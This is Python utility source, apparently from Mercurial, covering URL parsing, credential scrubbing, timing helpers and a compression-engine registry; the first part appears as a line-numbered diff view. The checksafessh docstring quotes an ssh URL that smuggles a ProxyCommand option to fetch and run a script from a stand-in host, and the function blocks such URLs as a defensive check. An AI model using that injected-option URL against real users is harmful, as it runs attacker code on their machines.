2634 2640 patterns = '|'.join(mapping.keys())
2635 2641 if escape_prefix:
2636 2642 patterns += '|' + prefix
2637 2643 if len(prefix) > 1:
2638 2644 prefix_char = prefix[1:]
2639 2645 else:
2640 2646 prefix_char = prefix
2641 2647 mapping[prefix_char] = prefix_char
2642 2648 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2643 2649 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2644 2650
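# Illustrative sketch: a prefix that is a regexp metacharacter must be
# passed pre-escaped, as the docstring above describes:
#
#   interpolate(br'\$', {b'foo': b'bar'}, b'say $foo')   # -> b'say bar'
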
2645 2651 def getport(port):
2646 2652 """Return the port for a given network service.
2647 2653
2648 2654 If port is an integer, it's returned as is. If it's a string, it's
2649 2655 looked up using socket.getservbyname(). If there's no matching
2650 2656 service, error.Abort is raised.
2651 2657 """
2652 2658 try:
2653 2659 return int(port)
2654 2660 except ValueError:
2655 2661 pass
2656 2662
2657 2663 try:
2658 2664 return socket.getservbyname(pycompat.sysstr(port))
2659 2665 except socket.error:
2660 2666 raise error.Abort(_("no port number associated with service '%s'")
2661 2667 % port)
2662 2668
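# Illustrative sketch: numeric strings pass through, while service names go
# through the platform services database (so 'http' normally maps to 80):
#
#   getport(b'8080')   # -> 8080
#   getport(b'http')   # -> 80 on a typical /etc/services setup
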
2663 2669 class url(object):
2664 2670 r"""Reliable URL parser.
2665 2671
2666 2672 This parses URLs and provides attributes for the following
2667 2673 components:
2668 2674
2669 2675 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2670 2676
2671 2677 Missing components are set to None. The only exception is
2672 2678 fragment, which is set to '' if present but empty.
2673 2679
2674 2680 If parsefragment is False, fragment is included in query. If
2675 2681 parsequery is False, query is included in path. If both are
2676 2682 False, both fragment and query are included in path.
2677 2683
2678 2684 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2679 2685
2680 2686 Note that for backward compatibility reasons, bundle URLs do not
2681 2687 take host names. That means 'bundle://../' has a path of '../'.
2682 2688
2683 2689 Examples:
2684 2690
2685 2691 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2686 2692 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2687 2693 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2688 2694 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2689 2695 >>> url(b'file:///home/joe/repo')
2690 2696 <url scheme: 'file', path: '/home/joe/repo'>
2691 2697 >>> url(b'file:///c:/temp/foo/')
2692 2698 <url scheme: 'file', path: 'c:/temp/foo/'>
2693 2699 >>> url(b'bundle:foo')
2694 2700 <url scheme: 'bundle', path: 'foo'>
2695 2701 >>> url(b'bundle://../foo')
2696 2702 <url scheme: 'bundle', path: '../foo'>
2697 2703 >>> url(br'c:\foo\bar')
2698 2704 <url path: 'c:\\foo\\bar'>
2699 2705 >>> url(br'\\blah\blah\blah')
2700 2706 <url path: '\\\\blah\\blah\\blah'>
2701 2707 >>> url(br'\\blah\blah\blah#baz')
2702 2708 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2703 2709 >>> url(br'file:///C:\users\me')
2704 2710 <url scheme: 'file', path: 'C:\\users\\me'>
2705 2711
2706 2712 Authentication credentials:
2707 2713
2708 2714 >>> url(b'ssh://joe:xyz@x/repo')
2709 2715 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2710 2716 >>> url(b'ssh://joe@x/repo')
2711 2717 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2712 2718
2713 2719 Query strings and fragments:
2714 2720
2715 2721 >>> url(b'http://host/a?b#c')
2716 2722 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2717 2723 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2718 2724 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2719 2725
2720 2726 Empty path:
2721 2727
2722 2728 >>> url(b'')
2723 2729 <url path: ''>
2724 2730 >>> url(b'#a')
2725 2731 <url path: '', fragment: 'a'>
2726 2732 >>> url(b'http://host/')
2727 2733 <url scheme: 'http', host: 'host', path: ''>
2728 2734 >>> url(b'http://host/#a')
2729 2735 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2730 2736
2731 2737 Only scheme:
2732 2738
2733 2739 >>> url(b'http:')
2734 2740 <url scheme: 'http'>
2735 2741 """
2736 2742
2737 2743 _safechars = "!~*'()+"
2738 2744 _safepchars = "/!~*'()+:\\"
2739 2745 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2740 2746
2741 2747 def __init__(self, path, parsequery=True, parsefragment=True):
2742 2748 # We slowly chomp away at path until we have only the path left
2743 2749 self.scheme = self.user = self.passwd = self.host = None
2744 2750 self.port = self.path = self.query = self.fragment = None
2745 2751 self._localpath = True
2746 2752 self._hostport = ''
2747 2753 self._origpath = path
2748 2754
2749 2755 if parsefragment and '#' in path:
2750 2756 path, self.fragment = path.split('#', 1)
2751 2757
2752 2758 # special case for Windows drive letters and UNC paths
2753 2759 if hasdriveletter(path) or path.startswith('\\\\'):
2754 2760 self.path = path
2755 2761 return
2756 2762
2757 2763 # For compatibility reasons, we can't handle bundle paths as
2758 2764 # normal URLS
2759 2765 if path.startswith('bundle:'):
2760 2766 self.scheme = 'bundle'
2761 2767 path = path[7:]
2762 2768 if path.startswith('//'):
2763 2769 path = path[2:]
2764 2770 self.path = path
2765 2771 return
2766 2772
2767 2773 if self._matchscheme(path):
2768 2774 parts = path.split(':', 1)
2769 2775 if parts[0]:
2770 2776 self.scheme, path = parts
2771 2777 self._localpath = False
2772 2778
2773 2779 if not path:
2774 2780 path = None
2775 2781 if self._localpath:
2776 2782 self.path = ''
2777 2783 return
2778 2784 else:
2779 2785 if self._localpath:
2780 2786 self.path = path
2781 2787 return
2782 2788
2783 2789 if parsequery and '?' in path:
2784 2790 path, self.query = path.split('?', 1)
2785 2791 if not path:
2786 2792 path = None
2787 2793 if not self.query:
2788 2794 self.query = None
2789 2795
2790 2796 # // is required to specify a host/authority
2791 2797 if path and path.startswith('//'):
2792 2798 parts = path[2:].split('/', 1)
2793 2799 if len(parts) > 1:
2794 2800 self.host, path = parts
2795 2801 else:
2796 2802 self.host = parts[0]
2797 2803 path = None
2798 2804 if not self.host:
2799 2805 self.host = None
2800 2806 # path of file:///d is /d
2801 2807 # path of file:///d:/ is d:/, not /d:/
2802 2808 if path and not hasdriveletter(path):
2803 2809 path = '/' + path
2804 2810
2805 2811 if self.host and '@' in self.host:
2806 2812 self.user, self.host = self.host.rsplit('@', 1)
2807 2813 if ':' in self.user:
2808 2814 self.user, self.passwd = self.user.split(':', 1)
2809 2815 if not self.host:
2810 2816 self.host = None
2811 2817
2812 2818 # Don't split on colons in IPv6 addresses without ports
2813 2819 if (self.host and ':' in self.host and
2814 2820 not (self.host.startswith('[') and self.host.endswith(']'))):
2815 2821 self._hostport = self.host
2816 2822 self.host, self.port = self.host.rsplit(':', 1)
2817 2823 if not self.host:
2818 2824 self.host = None
2819 2825
2820 2826 if (self.host and self.scheme == 'file' and
2821 2827 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2822 2828 raise error.Abort(_('file:// URLs can only refer to localhost'))
2823 2829
2824 2830 self.path = path
2825 2831
2826 2832 # leave the query string escaped
2827 2833 for a in ('user', 'passwd', 'host', 'port',
2828 2834 'path', 'fragment'):
2829 2835 v = getattr(self, a)
2830 2836 if v is not None:
2831 2837 setattr(self, a, urlreq.unquote(v))
2832 2838
2833 2839 @encoding.strmethod
2834 2840 def __repr__(self):
2835 2841 attrs = []
2836 2842 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2837 2843 'query', 'fragment'):
2838 2844 v = getattr(self, a)
2839 2845 if v is not None:
2840 2846 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2841 2847 return '<url %s>' % ', '.join(attrs)
2842 2848
2843 2849 def __bytes__(self):
2844 2850 r"""Join the URL's components back into a URL string.
2845 2851
2846 2852 Examples:
2847 2853
2848 2854 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2849 2855 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2850 2856 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2851 2857 'http://user:pw@host:80/?foo=bar&baz=42'
2852 2858 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2853 2859 'http://user:pw@host:80/?foo=bar%3dbaz'
2854 2860 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2855 2861 'ssh://user:pw@[::1]:2200//home/joe#'
2856 2862 >>> bytes(url(b'http://localhost:80//'))
2857 2863 'http://localhost:80//'
2858 2864 >>> bytes(url(b'http://localhost:80/'))
2859 2865 'http://localhost:80/'
2860 2866 >>> bytes(url(b'http://localhost:80'))
2861 2867 'http://localhost:80/'
2862 2868 >>> bytes(url(b'bundle:foo'))
2863 2869 'bundle:foo'
2864 2870 >>> bytes(url(b'bundle://../foo'))
2865 2871 'bundle:../foo'
2866 2872 >>> bytes(url(b'path'))
2867 2873 'path'
2868 2874 >>> bytes(url(b'file:///tmp/foo/bar'))
2869 2875 'file:///tmp/foo/bar'
2870 2876 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2871 2877 'file:///c:/tmp/foo/bar'
2872 2878 >>> print(url(br'bundle:foo\bar'))
2873 2879 bundle:foo\bar
2874 2880 >>> print(url(br'file:///D:\data\hg'))
2875 2881 file:///D:\data\hg
2876 2882 """
2877 2883 if self._localpath:
2878 2884 s = self.path
2879 2885 if self.scheme == 'bundle':
2880 2886 s = 'bundle:' + s
2881 2887 if self.fragment:
2882 2888 s += '#' + self.fragment
2883 2889 return s
2884 2890
2885 2891 s = self.scheme + ':'
2886 2892 if self.user or self.passwd or self.host:
2887 2893 s += '//'
2888 2894 elif self.scheme and (not self.path or self.path.startswith('/')
2889 2895 or hasdriveletter(self.path)):
2890 2896 s += '//'
2891 2897 if hasdriveletter(self.path):
2892 2898 s += '/'
2893 2899 if self.user:
2894 2900 s += urlreq.quote(self.user, safe=self._safechars)
2895 2901 if self.passwd:
2896 2902 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2897 2903 if self.user or self.passwd:
2898 2904 s += '@'
2899 2905 if self.host:
2900 2906 if not (self.host.startswith('[') and self.host.endswith(']')):
2901 2907 s += urlreq.quote(self.host)
2902 2908 else:
2903 2909 s += self.host
2904 2910 if self.port:
2905 2911 s += ':' + urlreq.quote(self.port)
2906 2912 if self.host:
2907 2913 s += '/'
2908 2914 if self.path:
2909 2915 # TODO: similar to the query string, we should not unescape the
2910 2916 # path when we store it, the path might contain '%2f' = '/',
2911 2917 # which we should *not* escape.
2912 2918 s += urlreq.quote(self.path, safe=self._safepchars)
2913 2919 if self.query:
2914 2920 # we store the query in escaped form.
2915 2921 s += '?' + self.query
2916 2922 if self.fragment is not None:
2917 2923 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2918 2924 return s
2919 2925
2920 2926 __str__ = encoding.strmethod(__bytes__)
2921 2927
2922 2928 def authinfo(self):
2923 2929 user, passwd = self.user, self.passwd
2924 2930 try:
2925 2931 self.user, self.passwd = None, None
2926 2932 s = bytes(self)
2927 2933 finally:
2928 2934 self.user, self.passwd = user, passwd
2929 2935 if not self.user:
2930 2936 return (s, None)
2931 2937 # authinfo[1] is passed to urllib2 password manager, and its
2932 2938 # URIs must not contain credentials. The host is passed in the
2933 2939 # URIs list because Python < 2.4.3 uses only that to search for
2934 2940 # a password.
2935 2941 return (s, (None, (s, self.host),
2936 2942 self.user, self.passwd or ''))
2937 2943
2938 2944 def isabs(self):
2939 2945 if self.scheme and self.scheme != 'file':
2940 2946 return True # remote URL
2941 2947 if hasdriveletter(self.path):
2942 2948 return True # absolute for our purposes - can't be joined()
2943 2949 if self.path.startswith(br'\\'):
2944 2950 return True # Windows UNC path
2945 2951 if self.path.startswith('/'):
2946 2952 return True # POSIX-style
2947 2953 return False
2948 2954
2949 2955 def localpath(self):
2950 2956 if self.scheme == 'file' or self.scheme == 'bundle':
2951 2957 path = self.path or '/'
2952 2958 # For Windows, we need to promote hosts containing drive
2953 2959 # letters to paths with drive letters.
2954 2960 if hasdriveletter(self._hostport):
2955 2961 path = self._hostport + '/' + self.path
2956 2962 elif (self.host is not None and self.path
2957 2963 and not hasdriveletter(path)):
2958 2964 path = '/' + path
2959 2965 return path
2960 2966 return self._origpath
2961 2967
2962 2968 def islocal(self):
2963 2969 '''whether localpath will return something that posixfile can open'''
2964 2970 return (not self.scheme or self.scheme == 'file'
2965 2971 or self.scheme == 'bundle')
2966 2972
2967 2973 def hasscheme(path):
2968 2974 return bool(url(path).scheme)
2969 2975
2970 2976 def hasdriveletter(path):
2971 2977 return path and path[1:2] == ':' and path[0:1].isalpha()
2972 2978
2973 2979 def urllocalpath(path):
2974 2980 return url(path, parsequery=False, parsefragment=False).localpath()
2975 2981
2976 2982 def checksafessh(path):
2977 2983 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2978 2984
2979 2985 This is a sanity check for ssh urls. ssh will parse the first item as
2980 2986 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2981 2987 Let's prevent these potentially exploited urls entirely and warn the
2982 2988 user.
2983 2989
2984 2990 Raises an error.Abort when the url is unsafe.
2985 2991 """
2986 2992 path = urlreq.unquote(path)
2987 2993 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2988 2994 raise error.Abort(_('potentially unsafe url: %r') %
2989 2995 (pycompat.bytestr(path),))
2990 2996
2991 2997 def hidepassword(u):
2992 2998 '''hide user credential in a url string'''
2993 2999 u = url(u)
2994 3000 if u.passwd:
2995 3001 u.passwd = '***'
2996 3002 return bytes(u)
2997 3003
2998 3004 def removeauth(u):
2999 3005 '''remove all authentication information from a url string'''
3000 3006 u = url(u)
3001 3007 u.user = u.passwd = None
3002 3008 return bytes(u)
3003 3009
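# Illustrative sketch of the two credential scrubbers:
#
#   hidepassword(b'http://joe:secret@example.com/repo')
#   # -> b'http://joe:***@example.com/repo'
#   removeauth(b'http://joe:secret@example.com/repo')
#   # -> b'http://example.com/repo'
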
3004 3010 timecount = unitcountfn(
3005 3011 (1, 1e3, _('%.0f s')),
3006 3012 (100, 1, _('%.1f s')),
3007 3013 (10, 1, _('%.2f s')),
3008 3014 (1, 1, _('%.3f s')),
3009 3015 (100, 0.001, _('%.1f ms')),
3010 3016 (10, 0.001, _('%.2f ms')),
3011 3017 (1, 0.001, _('%.3f ms')),
3012 3018 (100, 0.000001, _('%.1f us')),
3013 3019 (10, 0.000001, _('%.2f us')),
3014 3020 (1, 0.000001, _('%.3f us')),
3015 3021 (100, 0.000000001, _('%.1f ns')),
3016 3022 (10, 0.000000001, _('%.2f ns')),
3017 3023 (1, 0.000000001, _('%.3f ns')),
3018 3024 )
3019 3025
3020 3026 @attr.s
3021 3027 class timedcmstats(object):
3022 3028 """Stats information produced by the timedcm context manager on entering."""
3023 3029
3024 3030 # the starting value of the timer as a float (meaning and resolution are
3025 3031 # platform dependent, see util.timer)
3026 3032 start = attr.ib(default=attr.Factory(lambda: timer()))
3027 3033 # the number of seconds as a floating point value; starts at 0, updated when
3028 3034 # the context is exited.
3029 3035 elapsed = attr.ib(default=0)
3030 3036 # the number of nested timedcm context managers.
3031 3037 level = attr.ib(default=1)
3032 3038
3033 3039 def __bytes__(self):
3034 3040 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3035 3041
3036 3042 __str__ = encoding.strmethod(__bytes__)
3037 3043
3038 3044 @contextlib.contextmanager
3039 3045 def timedcm(whencefmt, *whenceargs):
3040 3046 """A context manager that produces timing information for a given context.
3041 3047
3042 3048 On entering a timedcmstats instance is produced.
3043 3049
3044 3050 This context manager is reentrant.
3045 3051
3046 3052 """
3047 3053 # track nested context managers
3048 3054 timedcm._nested += 1
3049 3055 timing_stats = timedcmstats(level=timedcm._nested)
3050 3056 try:
3051 3057 with tracing.log(whencefmt, *whenceargs):
3052 3058 yield timing_stats
3053 3059 finally:
3054 3060 timing_stats.elapsed = timer() - timing_stats.start
3055 3061 timedcm._nested -= 1
3056 3062
3057 3063 timedcm._nested = 0
3058 3064
3059 3065 def timed(func):
3060 3066 '''Report the execution time of a function call to stderr.
3061 3067
3062 3068 During development, use as a decorator when you need to measure
3063 3069 the cost of a function, e.g. as follows:
3064 3070
3065 3071 @util.timed
3066 3072 def foo(a, b, c):
3067 3073 pass
3068 3074 '''
3069 3075
3070 3076 def wrapper(*args, **kwargs):
3071 3077 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3072 3078 result = func(*args, **kwargs)
3073 3079 stderr = procutil.stderr
3074 3080 stderr.write('%s%s: %s\n' % (
3075 3081 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3076 3082 time_stats))
3077 3083 return result
3078 3084 return wrapper
3079 3085
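# Illustrative sketch: timedcm can also be used directly; the stats object
# is filled in when the context exits (the operation name is hypothetical):
#
#   with timedcm(b'revlog-demo') as stats:
#       pass   # ... timed work here ...
#   # bytes(stats) now renders the elapsed time, e.g. b'1.23 ms'
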
3080 3086 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3081 3087 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3082 3088
3083 3089 def sizetoint(s):
3084 3090 '''Convert a space specifier to a byte count.
3085 3091
3086 3092 >>> sizetoint(b'30')
3087 3093 30
3088 3094 >>> sizetoint(b'2.2kb')
3089 3095 2252
3090 3096 >>> sizetoint(b'6M')
3091 3097 6291456
3092 3098 '''
3093 3099 t = s.strip().lower()
3094 3100 try:
3095 3101 for k, u in _sizeunits:
3096 3102 if t.endswith(k):
3097 3103 return int(float(t[:-len(k)]) * u)
3098 3104 return int(t)
3099 3105 except ValueError:
3100 3106 raise error.ParseError(_("couldn't parse size: %s") % s)
3101 3107
3102 3108 class hooks(object):
3103 3109 '''A collection of hook functions that can be used to extend a
3104 3110 function's behavior. Hooks are called in lexicographic order,
3105 3111 based on the names of their sources.'''
3106 3112
3107 3113 def __init__(self):
3108 3114 self._hooks = []
3109 3115
3110 3116 def add(self, source, hook):
3111 3117 self._hooks.append((source, hook))
3112 3118
3113 3119 def __call__(self, *args):
3114 3120 self._hooks.sort(key=lambda x: x[0])
3115 3121 results = []
3116 3122 for source, hook in self._hooks:
3117 3123 results.append(hook(*args))
3118 3124 return results
3119 3125
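# Illustrative sketch: hooks run in lexicographic order of their source
# names, regardless of registration order:
#
#   h = hooks()
#   h.add(b'z-ext', lambda x: x * 2)
#   h.add(b'a-ext', lambda x: x + 1)
#   h(3)   # -> [4, 6]
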
3120 3126 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3121 3127 '''Yields lines for a nicely formatted stacktrace.
3122 3128 Skips the 'skip' last entries, then returns the last 'depth' entries.
3123 3129 Each file+linenumber is formatted according to fileline.
3124 3130 Each line is formatted according to line.
3125 3131 If line is None, it yields:
3126 3132 length of longest filepath+line number,
3127 3133 filepath+linenumber,
3128 3134 function
3129 3135
3130 3136 Not to be used in production code, but very convenient while developing.
3131 3137 '''
3132 3138 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3133 3139 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3134 3140 ][-depth:]
3135 3141 if entries:
3136 3142 fnmax = max(len(entry[0]) for entry in entries)
3137 3143 for fnln, func in entries:
3138 3144 if line is None:
3139 3145 yield (fnmax, fnln, func)
3140 3146 else:
3141 3147 yield line % (fnmax, fnln, func)
3142 3148
3143 3149 def debugstacktrace(msg='stacktrace', skip=0,
3144 3150 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3145 3151 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3146 3152 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3147 3153 By default it will flush stdout first.
3148 3154 It can be used everywhere and intentionally does not require an ui object.
3149 3155 Not to be used in production code, but very convenient while developing.
3150 3156 '''
3151 3157 if otherf:
3152 3158 otherf.flush()
3153 3159 f.write('%s at:\n' % msg.rstrip())
3154 3160 for line in getstackframes(skip + 1, depth=depth):
3155 3161 f.write(line)
3156 3162 f.flush()
3157 3163
3158 3164 class dirs(object):
3159 3165 '''a multiset of directory names from a dirstate or manifest'''
3160 3166
3161 3167 def __init__(self, map, skip=None):
3162 3168 self._dirs = {}
3163 3169 addpath = self.addpath
3164 3170 if safehasattr(map, 'iteritems') and skip is not None:
3165 3171 for f, s in map.iteritems():
3166 3172 if s[0] != skip:
3167 3173 addpath(f)
3168 3174 else:
3169 3175 for f in map:
3170 3176 addpath(f)
3171 3177
3172 3178 def addpath(self, path):
3173 3179 dirs = self._dirs
3174 3180 for base in finddirs(path):
3175 3181 if base in dirs:
3176 3182 dirs[base] += 1
3177 3183 return
3178 3184 dirs[base] = 1
3179 3185
3180 3186 def delpath(self, path):
3181 3187 dirs = self._dirs
3182 3188 for base in finddirs(path):
3183 3189 if dirs[base] > 1:
3184 3190 dirs[base] -= 1
3185 3191 return
3186 3192 del dirs[base]
3187 3193
3188 3194 def __iter__(self):
3189 3195 return iter(self._dirs)
3190 3196
3191 3197 def __contains__(self, d):
3192 3198 return d in self._dirs
3193 3199
3194 3200 if safehasattr(parsers, 'dirs'):
3195 3201 dirs = parsers.dirs
3196 3202
3197 3203 def finddirs(path):
3198 3204 pos = path.rfind('/')
3199 3205 while pos != -1:
3200 3206 yield path[:pos]
3201 3207 pos = path.rfind('/', 0, pos)
3202 3208
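# Illustrative sketch: finddirs() yields ancestors nearest-first, and the
# dirs multiset tracks only directories, not the leaf entries themselves:
#
#   list(finddirs(b'a/b/c'))   # -> [b'a/b', b'a']
#   d = dirs([b'a/b/c', b'a/d'])
#   b'a' in d        # -> True
#   b'a/b/c' in d    # -> False
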
# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))

class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of chunks of bytes representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``StorageError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

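# A minimal sketch (illustration only, not part of this module) of how an
# extension might plug in a custom engine; the 'mycomp' name and the
# pass-through behavior are hypothetical:
#
#   class _myengine(compressionengine):
#       def name(self):
#           return 'mycomp'
#       def compressstream(self, it, opts=None):
#           return it          # identity "compression", for illustration
#       def decompressorreader(self, fh):
#           return fh
#
#   compengines.register(_myengine())
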
class _CompressedStreamReader(object):
    def __init__(self, fh):
        if safehasattr(fh, 'unbufferedread'):
            self._reader = fh.unbufferedread
        else:
            self._reader = fh.read
        self._pending = []
        self._pos = 0
        self._eof = False

    def _decompress(self, chunk):
        raise NotImplementedError()

    def read(self, l):
        buf = []
        while True:
            while self._pending:
                if len(self._pending[0]) > l + self._pos:
                    newbuf = self._pending[0]
                    buf.append(newbuf[self._pos:self._pos + l])
                    self._pos += l
                    return ''.join(buf)

                newbuf = self._pending.pop(0)
                if self._pos:
                    buf.append(newbuf[self._pos:])
                    l -= len(newbuf) - self._pos
                else:
                    buf.append(newbuf)
                    l -= len(newbuf)
                self._pos = 0

            if self._eof:
                return ''.join(buf)
            chunk = self._reader(65536)
            self._decompress(chunk)
            if not chunk and not self._pending and not self._eof:
                # No progress and no new data, bail out
                return ''.join(buf)

class _GzipCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_GzipCompressedStreamReader, self).__init__(fh)
        self._decompobj = zlib.decompressobj()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
